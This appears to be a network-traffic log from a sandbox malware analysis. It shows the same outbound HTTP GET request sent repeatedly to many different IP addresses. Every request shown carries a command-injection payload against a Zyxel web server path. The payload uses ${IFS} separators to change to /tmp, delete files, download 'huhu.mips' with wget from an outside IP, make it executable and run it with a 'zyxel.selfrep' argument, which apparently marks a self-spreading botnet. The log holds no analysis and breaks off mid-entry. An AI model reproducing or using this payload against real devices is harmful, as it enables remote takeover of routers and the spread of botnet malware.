                                                      Feb 2, 2024 06:35:55.681232929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5028192.168.2.1453052125.106.186.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681252003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5029192.168.2.144344272.192.143.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681310892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5030192.168.2.1445302196.21.161.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681333065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5031192.168.2.145814098.93.24.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681379080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5032192.168.2.145478080.61.37.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681415081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5033192.168.2.1436520112.177.188.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681447029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5034192.168.2.1438828157.27.145.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681490898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5035192.168.2.1460424161.222.227.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681512117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5036192.168.2.145417237.171.148.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681576967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5037192.168.2.1434686204.170.193.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681607008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5038192.168.2.145190693.183.47.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681636095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5039192.168.2.1433920182.162.37.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681672096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5040192.168.2.1439802139.221.25.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681706905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5041192.168.2.1450334144.56.24.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681756020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5042192.168.2.1454936208.176.208.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681797981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5043192.168.2.1456190216.204.184.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681839943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5044192.168.2.1457140157.129.229.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681863070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5045192.168.2.1434926179.44.167.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681919098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5046192.168.2.144169858.63.249.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681962967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5047192.168.2.145842086.55.48.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681992054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5048192.168.2.1440260198.232.170.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682046890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5049192.168.2.1443586155.122.5.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682075024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5050192.168.2.1443974133.185.115.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682118893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5051192.168.2.143605425.178.72.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682156086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5052192.168.2.1459188103.159.10.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682200909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5053192.168.2.1445634197.200.126.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682231903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5054192.168.2.1460680202.206.95.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682257891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5055192.168.2.1457372108.191.76.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682296038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5056192.168.2.144761819.254.190.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682329893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5057192.168.2.145795027.126.108.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682365894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5058192.168.2.1451112136.29.48.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682421923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5059192.168.2.14355641.216.62.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682460070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5060192.168.2.1456252124.164.39.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682503939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5061192.168.2.1445952135.103.25.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682531118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5062192.168.2.14581384.53.18.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682570934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5063192.168.2.143642254.67.203.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682621956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5064192.168.2.1456432208.252.125.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682656050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5065192.168.2.1459212192.202.107.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682694912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5066192.168.2.1449120206.69.164.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682742119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5067192.168.2.145215219.87.113.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682801962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5068192.168.2.1449266157.66.204.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682852983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5069192.168.2.145345872.84.6.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682887077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5070192.168.2.144324849.98.65.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682936907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5071192.168.2.1435392199.64.233.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.682979107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5072192.168.2.1447286177.144.248.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683008909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5073192.168.2.1434562113.245.19.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683053017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5074192.168.2.144924252.223.93.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683089018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5075192.168.2.1441612220.84.131.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683129072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5076192.168.2.144028289.50.8.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683186054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5077192.168.2.1447830219.138.50.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683229923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5078192.168.2.143687443.22.239.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683264017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5079192.168.2.1434486108.36.49.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683306932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5080192.168.2.1442714207.26.120.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683331013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5081192.168.2.1455794170.7.197.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683361053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5082192.168.2.1450932175.93.135.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683422089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5083192.168.2.1437274118.227.127.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683454037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5084192.168.2.1446776126.170.158.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683487892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5085192.168.2.1460360186.49.206.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683514118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5086192.168.2.146026693.78.107.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683578968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5087192.168.2.1432908131.14.168.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683609962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5088192.168.2.1448920105.251.41.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683669090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5089192.168.2.144546047.217.121.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683731079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5090192.168.2.1434702163.141.31.44443
                                                      TimestampBytes transferredDirectionData
